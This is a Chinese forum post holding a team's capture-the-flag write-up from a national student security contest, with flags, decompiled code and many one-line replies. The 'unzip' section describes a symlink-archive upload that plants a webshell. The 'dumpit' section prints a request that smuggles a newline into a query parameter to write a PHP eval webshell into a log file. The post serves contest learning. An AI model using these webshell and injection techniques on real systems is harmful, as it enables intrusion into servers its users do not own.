来一次全国大赛——大学生信息安全国赛WP解题过程经验

spider   ·   发表于 2023-05-28 14:47:48   ·   CTF&WP专版

一、前言

大家好,我是spider我又来给同学们做比赛分享啦,其中内容是我们整个队伍的wp报告,有很多的解题思路大家可以看看学习一下喔

解题过程

1 签到卡

操作内容:
题目提示python,直接python读文件


如该题使用自己编写的脚本代码请详细写出,不允许截图


flag值:
flag{17a6db89-f1c3-4ea2-8b15-76c206e23758}

2 被加密的生产流量

操作内容:
题目为modbus流量,进行分析


追踪流


Base32编码 解码得到flag


flag值:
c1f_fi1g_1000

3、可信度量

连接ssh,全局搜索flag


flag值:
flag{cbef0df4-bdbe-4d1e-8282-61904188e135}

4、烧烤摊

操作内容:
直接覆盖内存即可
如该题使用自己编写的脚本代码请详细写出,不允许截图



flag值:
flag{cbef0d9-bdbe-4d4e-8282-61904188e1857}

ezbyte

操作内容:
ida逆向找到关键逻辑sub_404021

__int64 __fastcall sub_404D25(__int64 a1, __int64 a2, __int64 a3, __int64 a4, int a5, int a6)
{
  __int64 v6; // rax
  __int64 result; // rax
  __int64 v8[2]; // [rsp+10h] [rbp-420h] BYREF
  char v9[1008]; // [rsp+20h] [rbp-410h] BYREF
  unsigned __int64 v10; // [rsp+418h] [rbp-18h]

  v10 = __readfsqword(0x28u);
  v8[0] = 0LL;
  v8[1] = 0LL;
  memset(v9, 0, sizeof(v9));
  sub_4D1840((unsigned int)"%100s", (unsigned int)v8, (unsigned int)v9, 0, a5, a6);
  v6 = sub_46F4F0(&unk_5D5520, v8);
  sub_46E060(v6, sub_46EE20);
  sub_404C21((unsigned __int8 *)v8);
  result = 0LL;
  if ( __readfsqword(0x28u) != v10 )
    sub_535290();
  return result;
}
__int64 __fastcall sub_404C21(unsigned __int8 *a1)
{
  __int64 result; // rax

  result = *a1;
  if ( (_BYTE)result == 'f' )
  {
    result = a1[1];
    if ( (_BYTE)result == 'l' )
    {
      result = a1[2];
      if ( (_BYTE)result == 'a' )
      {
        result = a1[3];
        if ( (_BYTE)result == 'g' )
        {
          result = a1[4];
          if ( (_BYTE)result == 123 )
          {
            result = a1[41];
            if ( (_BYTE)result == 125 )
            {
              result = a1[40];
              if ( (_BYTE)result == 49 )
              {
                result = a1[39];
                if ( (_BYTE)result == 54 )
                {
                  result = a1[38];
                  if ( (_BYTE)result == 56 )
                  {
                    result = a1[37];
                    if ( (_BYTE)result == 51 )
                      sub_404BF5();
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return result;
}

readelf读取堆栈信息

DW_CFA_val_expression: r12 (r12) (DW_OP_constu: 8722213363631027234; DW_OP_constu: 1890878197237214971; DW_OP_constu: 9123704; DW_OP_breg15 (r15): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_constu: 2451795628338718684; DW_OP_constu: 1098791727398412397; DW_OP_constu: 1512312; DW_OP_breg14 (r14): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_constu: 8502251781212277489; DW_OP_constu: 1209847170981118947; DW_OP_constu: 8971237; DW_OP_breg13 (r13): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_constu: 2616514329260088143; DW_OP_constu: 1237891274917891239; DW_OP_constu: 1892739; DW_OP_breg12 (r12): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_plus; DW_OP_plus; DW_OP_plus)

求解出R12-R15
加上sub_404021中的3861得到flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}
flag值:
flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}

国密算法

本地生成sm2的公私钥

Private_Key = BFFD2FE38BF5C0B97CDA22E2AF425DCBA4F837A1A0318FF4E41CC1B6A084BA6B

Public_Key = 4DA34811AFA50733A33C010572A3D1E1218A1792FF9D87F97D1166A121B10E180F3FD952B6A9D0E19673BEBA9741C27A08EC64C604F4CDD8F9CD39CA9375E52E

按照题目进行传参获取到唯一的ID

json
{
  "message": "success",
  "data": {
    "id": "28056b31-4e1b-4c54-a08e-3ce6005b4030"
  }
}

传参公钥,获取服务器返回的私钥内容和随机数

json
{
  "message": "success",
  "data": {
    "publicKey": "04a9e33a5a306d67fe75c90b8d25ec40a843916501344f3be11193b789b6344a427b041f56df6d897c9b3d75de24a5e537882a74aa8433036c6f0626dd60365e0e",
    "privateKey": "f9a20c70d24eb917f8d4293be839337457724033f93ee8af76e5ff5493820713",
    "randomString": "de4ee03e27f12ce174f8cfcbe992120b28d8a1a0571f4b3b414589d9f22d1e013c0c9d714d1aff129eea1247e632a57031026a39643f35f1126e88d2bf0124d7e222b2d6128f62ae3d82ce67659a6a81f10d8883ef1ea5e004a1ff36a18be1ee275f827798e264213702b73b291a8235",
    "id": "28056b31-4e1b-4c54-a08e-3ce6005b4030"
  }
}

使用本地私钥对randomstring解密,然后使用其对服务器返回的私钥解密。

解密内容如下

AE 5F E0 3E 4C 31 6C 91  B4 E2 89 A7 6D A2 B5 B9 27 D1 FC 7F 21 0C B3 DA  2E 12 5F 63 EF B7 22 98

传参ID获取服务器返回的加密随机数

json
{
  "message": "success",
  "data": {
    "id": "28056b31-4e1b-4c54-a08e-3ce6005b4030",
    "quantumString": "13f7b23b6309a6a973a525ee3f99963b86f19ea6bb15e47e682b3ea50e4d0d49f11d5c0510c21c30ec361b5ff0a60fa21ebdbced36858797680a925d5b4d5f584e96524b6be9a84610d4c3b704bbc59dd370bf9ad6724f954aae407cfaea62c3e4cb6bdbd84facfb5da0f46806f32c2e"
  }
}

使用上述密钥解密内容,然后传参check
获取flag
flag{634d7a14-f0b6-4f71-a935-bddf5835f015}

unzip


新建一个目录
到目录下创建软连接
然后打一个压缩包
zip —symlinks test.zip ./*


然后在到上级目录在新建一个test目录进去
创建一个shell文件


然后返回上一级打压缩包zip -r test1.zip test


然后先上传第一个压缩包之后
在上传第二个压缩包
记得抓包改一下content-type


再上传一句话木马即可

dumpit

操作内容:

use ?db=&table_2_query= or ?db=&table_2_dump= to view the tables! etc:?db=ctf&table_2_query=flag1

考查sql注入
不过flag都是假的,?db=&table_2_dump=发现有日志,联想通过日志getsheell

http://eci-2ze8hwdukyef6c2sjsey.cloudeci1.ichunqiu.com:8888/?db=ctf&amp;table_2_dump=flag1%0Aecho "<?php <span class="label label-primary">@eval(getallheaders()['User-Agent'])?</span>>" &gt; "/app/log/4.php"%0A

访问4.php即可
运行env即可得到flag


flag值:
flag{7e519224-df95-41a5-8dd4-b391064bdf58}

funcanary

操作内容:
逐字节爆破canary,有后门在0x1229处,部分地址写低16字节,一字节爆破
如该题使用自己编写的脚本代码请详细写出,不允许截图



flag值:
flag{78368a9c-a068-47c1-9816-06683c2246b0}

近一段时间以来的自勉总结

知识如果没有归纳、分类,到最终也不会总结出自己的东西。不要盲目追随他人的脚步,你要玩出自己的节奏,每个人都有自己的人生进度条儿,努力即可,事在人为,冲鸭!!!!

用户名金币积分时间理由
Track-子羽 80.00 0 2023-05-30 14:02:33 活动翻倍
Track-子羽 80.00 0 2023-05-30 14:02:18 一个受益终生的帖子~~

打赏我,让我更有动力~

72 条回复   |  直到 2023-8-13 | 3603 次浏览

邓超
发表于 2023-5-30

1

评论列表

  • 加载数据中...

编写评论内容

学kali的小白
发表于 2023-5-30

1

评论列表

  • 加载数据中...

编写评论内容

oldmanpushcar
发表于 2023-5-30

君子不重则不威,学则不固,主忠信,无友不如己者,过则勿惮改。

评论列表

  • 加载数据中...

编写评论内容

hareguo
发表于 2023-5-30

1

评论列表

  • 加载数据中...

编写评论内容

无声
发表于 2023-5-30

1

评论列表

  • 加载数据中...

编写评论内容

19978445189
发表于 2023-5-30

1

评论列表

  • 加载数据中...

编写评论内容

芝士土拨鼠
发表于 2023-5-30

1

评论列表

  • 加载数据中...

编写评论内容

xfsec
发表于 2023-5-30

看看,谢谢分享

评论列表

  • 加载数据中...

编写评论内容

kxxxx
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

xiaoxing666
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

xiaoeyu
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

nocircle
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

羽义
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

天狗
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

南慕丶
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

陈星
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

1198950962
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

kk1230
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

kilo1_
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容

a744566
发表于 2023-5-31

1

评论列表

  • 加载数据中...

编写评论内容
1 2 3 4 / 4 跳转 尾页
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.